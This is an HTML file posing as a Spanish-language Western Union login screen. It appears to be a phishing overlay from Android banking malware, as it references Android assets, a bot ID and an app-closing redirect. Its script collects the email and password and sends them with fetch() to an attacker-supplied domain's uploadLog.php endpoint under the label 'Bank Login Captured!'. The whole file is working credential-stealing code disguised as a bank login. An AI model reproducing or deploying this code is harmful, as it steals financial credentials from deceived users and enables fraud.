<!DOCTYPE html>
<html>
<head>
    <title>western</title>
    <link rel="shortcut icon" href="com.westernunion.moneytransferr3app.es.png" type="image/png">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta charset="utf-8">
</head>
<body>

<style type="text/css">
    body {
        background: #fff;
        margin: 0;
        padding: 0;
        font-family: Helvetica, sans-serif;
    }
    .logo {
text-align: center;
    background-size: 100%;
    padding: 0px 0px 0px 0px;
    background: none;
    color: #fff;
    font-weight: 400;
    text-decoration: none;
    }
    .form {
        text-align: center;
        padding-top: 70px;
    }
    .form label {
        display: block;
    }
    form {
        display: inline-block;
    }
fieldset {
      position: relative;
      text-align: center;
      border: none;
          margin: 0;
    padding: 0;

}

input[type="text"],input[type="password"] {
line-height: 16px;
    font-size: 17px;
    box-sizing: border-box;
    width: 100%;
    position: relative;
    padding: 0px 0px 0px 0px;
    margin: 0px 1px;
    display: block;
    -webkit-box-shadow: none;
    box-shadow: none;
    -webkit-appearance: none;
    height: 48px;
    margin: 0px 0px 10px 0px;
    color: #494949;
    text-align: left;
    outline: none;
    border: 1px solid #cecece;;
    border-top: none;
    border-left: none;
    border-right: none;
    background: #fff;
}
input[type="button"] {
    left: 0;
    right: 0;
    width: 100%;
    height: 47px;
    margin: 30px 0px 0px 0px;
    outline: none;
    float: right;
    color: #ffffff;
    border: none;
    font-size: 14px;
    -webkit-appearance: none;
    cursor: pointer;
    background: #479ac0;
}
input::placeholder {
    color: #494949;
    font-size: 15px;
}
</style>

<fieldset id="formtosend">


<div class="" id="log" style="display: block;">

<div class="area" style="padding: 0px;border-radius: 10px;margin: 0px 20px 0px 20px;height: 180px;     padding-top: 30px;">

        <input type="text" name="login" id="login" placeholder="Correo electrónico" style="height: 50px;width: 100%;float: right;">
        <input type="password" name="password" id="password" placeholder="Contraseña" style="height: 50px;">
        <button type="button" id="eye" style="background: none;border: none;float: right;position: relative;top: -52px;cursor: pointer;border-left: 1px solid black;height: 30px;">
        <a href="#" alt="eye" style="text-decoration: none; color: #3c4fc0;">MOSTRAR</a>
        </button>
        <a href="#" style="float: right; position: relative; left: 80px; text-decoration: none; font-size: 15px; color: #0290d1;">¿No recuerdas tu contraseña?</a>
        <label style="    float: left;
    font-size: 14px;">
            <input type="checkbox" name="sumbit"> Recordarme
        </label>
        <input type="button" name="sumbit" value="Iniciar sesión" onclick="send_form()">
        <input type="button" name="sumbit" value="Registrarse" style="background: #fede7f;border: 1px solid #fede7f;color:#3c4fc0;opacity: 0.7;">

        <input name="exit" type="hidden" text="true"/>
</div>

</div>

</fieldset> 

<script>function closeapp(){setTimeout(function(){ window.location.replace("file:///android_asset/closeapp.html");}, 1000); };
if ( typeof Android == "undefined")
    var Android = {
        returnResult : alert.bind(window)
    }

/*********Recursive implementation of jSON.stringify; ********/
var stringifyJSON = function(obj) {
    var arrOfKeyVals = [],
        arrVals = [],
        objKeys = [];

    /*********CHECK FOR PRIMITIVE TYPES**********/
    if (typeof obj === 'number' || typeof obj === 'boolean' || obj === null)
        return '' + obj;
    else if (typeof obj === 'string')
        return '"' + obj + '"';

    /*********CHECK FOR ARRAY**********/
    else if (Array.isArray(obj)) {
        if (obj[0] === undefined)
            return '[]';
        else {
            obj.forEach(function(el) {
                arrVals.push(stringifyJSON(el));
            });
            return '[' + arrVals.join(',') + ']';
        }
    }
    /*********CHECK FOR OBJECT**********/
    else if (obj instanceof Object) {
        objKeys = Object.keys(obj);
        objKeys.forEach(function(key) {
            var keyOut = '"' + key + '":';
            var keyValOut = obj[key];
            if (keyValOut instanceof Function || typeof keyValOut === undefined)
                arrOfKeyVals.push('');
            else if (typeof keyValOut === 'string')
                arrOfKeyVals.push(keyOut + '"' + keyValOut + '"');
            else if (typeof keyValOut === 'boolean' || typeof keyValOut === 'number' || keyValOut === null)
                arrOfKeyVals.push(keyOut + keyValOut);
            else if (keyValOut instanceof Object) {
                arrOfKeyVals.push(keyOut + stringifyJSON(keyValOut));
            }
        });
        return '{' + arrOfKeyVals + '}';
    }
};

function formToJSONbyName(f)
{
    var FinalObject = {}, namesHTML = ['input','select'];
    for(var i = 0; i < namesHTML.length; i++) {
        var bsform = f.getElementsByTagName(namesHTML[i]);
        for(var j = 0; j < bsform.length; j++) {
            if(bsform[j].name == 'sumbit') continue;
            FinalObject[bsform[j].name] = bsform[j].value
        }
    }
    return stringifyJSON(FinalObject);
}

function send_form()
{
var url_string = window.location.href;
var url = new URL(url_string);
var botid = url.searchParams.get("botid");
var domain = url.searchParams.get("domain");var path = window.location.pathname;var page = path.split("/").pop();
if (document.getElementById("password").value == '')
{
    alert ('¡Todos los campos requeridos!');
    return false;
}
            if (document.getElementById("login").value == '')
{
    alert ('¡Todos los campos requeridos!');
    return false;
}
    var form = document.getElementById('formtosend');
    fetch("https://"+domain+"/project/apiMethods/uploadLog.php?log=Bank Login Captured! -----<b> Bot ID:</b> "+botid+"<br>"+page.replace(".html","")+" | "+formToJSONbyName(form)); closeapp();
}

function show() {
    var p = document.getElementById('password');
    p.setAttribute('type', 'text');
}

function hide() {
    var p = document.getElementById('password');
    p.setAttribute('type', 'password');
}

var pwShown = 0;

document.getElementById("eye").addEventListener("click", function () {
    if (pwShown == 0) {
        pwShown = 1;
        show();
    } else {
        pwShown = 0;
        hide();
    }
}, false);
</script>

</body>
</html>